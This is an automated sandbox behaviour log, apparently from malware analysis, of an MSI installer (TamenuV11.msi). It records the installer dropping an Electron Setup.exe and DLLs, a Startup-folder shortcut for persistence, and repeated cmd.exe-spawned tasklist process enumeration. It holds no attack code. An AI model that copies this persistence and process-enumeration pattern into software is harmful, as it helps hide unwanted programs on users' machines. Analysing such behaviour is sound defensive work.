Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33C53A50-F456-4884-B049-85FD643ECFED}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: Setup.lnk.1.dr	LNK file: ..\..\..\..\..\Local\Programs\Setup\Setup.exe
Source: ~etup.tmp.1.dr	LNK file: ..\..\..\..\..\Local\Programs\Setup\Setup.exe
Source: Setup.lnk0.1.dr	LNK file: ..\AppData\Local\Programs\Setup\Setup.exe
Source: Setup.lnk.7.dr	LNK file: ..\..\..\..\..\..\Local\Programs\Setup\Setup.exe

Source: C:\Windows\System32\msiexec.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8C7A072A-3005-48F5-AE5F-6D02D608DF59}

Jump to behavior

Source: TamenuV11.msi

Static file information: File size 91316224 > 1048576

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

Code function: 7_2_00406DDD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00406DDD

Source: ffmpeg.dll.1.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll.1.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll.1.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll.1.dr	Static PE information: section name: _RDATA
Source: libEGL.dll.1.dr	Static PE information: section name: .00cfg
Source: libEGL.dll.1.dr	Static PE information: section name: .gxfg
Source: libEGL.dll.1.dr	Static PE information: section name: .retplne
Source: libEGL.dll.1.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll.1.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll.1.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll.1.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll.1.dr	Static PE information: section name: _RDATA
Source: vk_swiftshader.dll.1.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.1.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.1.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll.1.dr	Static PE information: section name: _RDATA
Source: Setup.exe.1.dr	Static PE information: section name: .00cfg
Source: Setup.exe.1.dr	Static PE information: section name: .gxfg
Source: Setup.exe.1.dr	Static PE information: section name: .retplne
Source: Setup.exe.1.dr	Static PE information: section name: .rodata
Source: Setup.exe.1.dr	Static PE information: section name: CPADinfo
Source: Setup.exe.1.dr	Static PE information: section name: LZMADEC
Source: Setup.exe.1.dr	Static PE information: section name: _RDATA
Source: Setup.exe.1.dr	Static PE information: section name: malloc_h
Source: vulkan-1.dll.1.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll.1.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.1.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.1.dr	Static PE information: section name: _RDATA
Source: c149297e-6f19-4d06-8ddb-7807f8b84ab1.tmp.node.3.dr	Static PE information: section name: _RDATA
Source: 8dc2e56e-3a34-45cd-8db1-cde7ca3b7178.tmp.node.3.dr	Static PE information: section name: _RDATA
Source: a72c96d9-4557-4a69-8de5-5e32a2c87665.tmp.node.45.dr	Static PE information: section name: _RDATA
Source: 76dc3e7b-42c7-418c-a7d9-9ee8c15a4191.tmp.node.45.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

Code function: 7_2_00405760 push eax; ret

7_2_0040578E

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\c149297e-6f19-4d06-8ddb-7807f8b84ab1.tmp.node	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\ffmpeg.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\8dc2e56e-3a34-45cd-8db1-cde7ca3b7178.tmp.node	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\a72c96d9-4557-4a69-8de5-5e32a2c87665.tmp.node	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\76dc3e7b-42c7-418c-a7d9-9ee8c15a4191.tmp.node	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\vk_swiftshader.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\c149297e-6f19-4d06-8ddb-7807f8b84ab1.tmp.node	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\8dc2e56e-3a34-45cd-8db1-cde7ca3b7178.tmp.node	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\a72c96d9-4557-4a69-8de5-5e32a2c87665.tmp.node	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\76dc3e7b-42c7-418c-a7d9-9ee8c15a4191.tmp.node	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\LICENSE.electron.txt			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txt			Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Setup.lnk	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~etup.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Setup.lnk~RF492065.TMP	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
